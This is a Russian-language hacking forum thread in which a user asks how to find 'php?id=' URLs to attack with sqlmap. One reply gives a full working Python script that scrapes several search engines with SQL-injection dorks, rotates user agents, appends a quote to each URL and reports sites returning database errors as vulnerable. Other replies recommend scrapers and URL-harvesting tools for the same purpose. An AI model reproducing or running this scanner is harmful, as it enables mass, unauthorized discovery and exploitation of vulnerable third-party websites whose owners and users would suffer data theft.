Как достать сайтов php?id=1 для sql инъекций

[shivaNEW]

Можете рассказать как находить вот эти айдишники для того чтобы sqlmap не требовал id сайта

 

[cvve]

Можете рассказать как находить вот эти айдишники для того чтобы sqlmap не требовал id сайта

Через гугл дорки как минимум, либо же можно это все автоматизировать через скрипт. если нужно могу кинуть подобный скрипт

 

[xmyriy]

Что значит не требовал? sqlmap должен сам понять, в каком параметре может быть иньекция?

 

[shivaNEW]

Через гугл дорки как минимум, либо же можно это все автоматизировать через скрипт. если нужно могу кинуть подобный скрипт

Давай

 

[cvve]

Давай

import requests
import threading
import random
from bs4 import BeautifulSoup
from fake_useragent import UserAgent
import urllib3
import os
from termcolor import colored
from tqdm import tqdm
urllib3.disable_warnings()
SEARCH_ENGINES = {
'google': 'https://www.google.com/search?q={}',
'bing': 'https://www.bing.com/search?q={}',
'yahoo': 'https://search.yahoo.com/search?p={}',
'duckduckgo': 'https://duckduckgo.com/html?q={}'
}
BLOCKED_DOMAINS = {
'youtube.com', 'google.com', 'facebook.com', 'microsoft.com', 'github.com',
'amazon.com', 'stackoverflow.com', 'linkedin.com', 'twitter.com', 'instagram.com'
}
dorks = [
"inurl:.php?id=",
"inurl:.asp?id=",
"inurl:product.php?id=",
"inurl:category.php?id=",
"inurl:news.php?id=",
"inurl:index.php?id=",
"inurl:item.php?id=",
"inurl:view.php?id=",
"inurl:article.php?id=",
"inurl:show.php?id=",
"inurl:gallery.php?id=",
"inurl:event.php?id=",
"inurl:download.php?id=",
"inurl:main.php?id=",
"inurl:review.php?id=",
"inurl:process.php?id=",
"inurl:plugin.php?id=",
"inurl:readme.php?id=",
"inurl:profile.php?id=",
"inurl:about.php?id=",
"inurl:file.php?id=",
"inurl:user.php?id=",
"inurl:page.php?pid=",
"inurl:forum.php?topic=",
"inurl:thread.php?tid=",
"inurl:message.php?id=",
"inurl:cart.php?id="
]
sql_errors = [
"mysql_fetch_array()",
"You have an error in your SQL syntax",
"Warning: mysql_",
"mysqli_fetch_array",
"Error Executing Database Query"
]
ua = UserAgent()
lock = threading.Lock()
scanned_urls = set()
vulnerable_sites = set()
pause_scan = threading.Event()
def clear():
os.system('cls' if os.name == 'nt' else 'clear')
def center_text(text):
terminal_width = os.get_terminal_size().columns
lines = text.split('\n')
centered_lines = []
for line in lines:
if line.strip():
padding = (terminal_width - len(line)) // 2
centered_lines.append(' ' * padding + line)
else:
centered_lines.append(line)
return '\n'.join(centered_lines)
def print_banner():
clear()
banner = '''
⠀⠀⠀⠀⠀⢸⣿⣷⣶⣤⣀⣤⣴⣶⣶⣶⣶⣦⣤⣀⣤⣶⣾⣿⡇⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠘⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠃⠀⠀⠀⠀⠀
⠀⠀⠠⣤⣀⡀⠹⣿⣿⣿⣿⠿⠿⣿⣿⣿⣿⠿⠿⣿⣿⣿⣿⠃⢀⣀⣤⠄⠀⠀
⢀⠤⢤⣤⣬⣙⠳⣿⣿⡿⠀⢀⠀⠈⣿⣿⠁⠀⡀⠈⣿⣿⣿⠞⣋⣥⣤⠤⠤⡀
⠀⢀⡤⠤⢤⣼⣿⣿⣿⣿⡀⠸⠀⣠⣿⣿⣄⠐⠇⢀⣿⣿⣿⣿⣧⡤⠤⢤⡀⠀
⠀⠀⢠⣾⣿⣿⣿⣿⣿⣿⠛⠛⠛⠛⠉⠉⠛⠛⠛⠛⣿⣿⣿⣿⣿⣿⣷⡀⠀⠀
⠀⠀⠀⠛⠿⢿⣿⠟⠛⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠛⠻⣿⡿⠻⠛⠀⠀⠀
'''
print(colored(center_text(banner), 'red', attrs=['bold']))
print(colored(center_text("Developed by Layos"), 'yellow', attrs=['bold']))
def get_random_headers():
return {
'User-Agent': ua.random,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'DNT': '1',
'Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1'
}
def normalize_url(url):
return url.split('?')[0]
def search_urls(dork):
urls = set()
for engine in SEARCH_ENGINES.keys():
try:
response = requests.get(
SEARCH_ENGINES[engine].format(dork),
headers=get_random_headers(),
verify=False,
timeout=5
)
if response.status_code == 200:
soup = BeautifulSoup(response.text, 'html.parser')
for link in soup.find_all('a'):
url = link.get('href', '')
if any(d in url for d in ['.php?', '.asp?']):
if not any(bd in url for bd in BLOCKED_DOMAINS):
normalized_url = normalize_url(url)
if normalized_url not in scanned_urls:
urls.add(url)
scanned_urls.add(normalized_url)
except:
continue
return urls
def check_sqli(url):
try:
response = requests.get(url + "'", headers=get_random_headers(), verify=False, timeout=1)
content = response.text.lower()
return any(error.lower() in content for error in sql_errors)
except:
return False
def update_progress(url):
print(colored(f"Scanning: {url}", 'cyan', attrs=['bold']), end='\r')
def worker(dork):
try:
urls = search_urls(dork)
for url in urls:
pause_scan.wait()
update_progress(url)
if check_sqli(url) and url not in vulnerable_sites:
with lock:
vulnerable_sites.add(url)
print(colored(f"\n[+] Vulnerable: {url}", 'red', attrs=['bold']))
print(colored("Press Enter to continue...", 'yellow', attrs=['bold']))
pause_scan.clear()
input()
pause_scan.set()
except:
pass
def main():
print_banner()
thread_count = 30
running = True
pause_scan.set()

while running:
threads = []
random.shuffle(dorks)

for dork in dorks:
if len(threads) >= thread_count:
for t in threads:
t.join()
threads = []

t = threading.Thread(target=worker, args=(dork,))
t.daemon = True
t.start()
threads.append(t)

for t in threads:
t.join()
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
print(colored("\n[!] Exiting...", 'red', attrs=['bold']))
exit(0)

 

[Litara_B]

К сожалению с этими дорками человеку ничего не светит) Забегая наперед скажу- что и комбайны по их "производству" не помогут из "слитых" гайдов пендосов. Экономлю вам время жизни в разы) /threads/120314/ изучайте Всё простыми словами и с картинками Это однозначный ответ на твой вопрос ТС)

 

[zhuleak]

Да, вручную очень долго. А через разные скрипты Гугль банит. Помогут разные сеошные софтины и сервисы, которые парсят выдачу ТОП10-ТОП100 по поисковому запросу (пихаем дорки). На выходе получаем файл со списком всех урлов и дальше работаем с ним.

 

[zdestuta]

Да, вручную очень долго. А через разные скрипты Гугль банит.

вон чувак линкедин доркает и парсит через АПИ поиска + n8n собирает инфу в гугл таблицу и ничо

 

[_C3FaRiR_]

вон чувак линкедин доркает и парсит через АПИ поиска + n8n собирает инфу в гугл таблицу и ничо

Ага нормуль чувак мутит движуху)
Я посмотрел видео - голова чуть не взорвалась в конце)
Имхо видео рассчитано для более опытных юзеров)

 

[zdestuta]

Ага нормуль чувак мутит движуху)
Я посмотрел видео - голова чуть не взорвалась в конце)
Имхо видео рассчитано для более опытных юзеров)

Ну если n8n это "для более опытных" , то у меня плохие новости: модный n8n, как и его прямой более зрелый и древний конкурент Node-RED (более крутой по факту, но менее красявый и PRнутый просто) - они как раз деланы "для не-ITшных бабулек и дедулек", ну типа автомэйшн-флоу делать - это даже не программирование ведь (может какие небольшие только кусочечки кода) - как раз на "продвинутых пользователей" рассчитаны продукты.

 

[FusBOTnet]

Самое легкое и полезное, инструменты
waybackurls
gau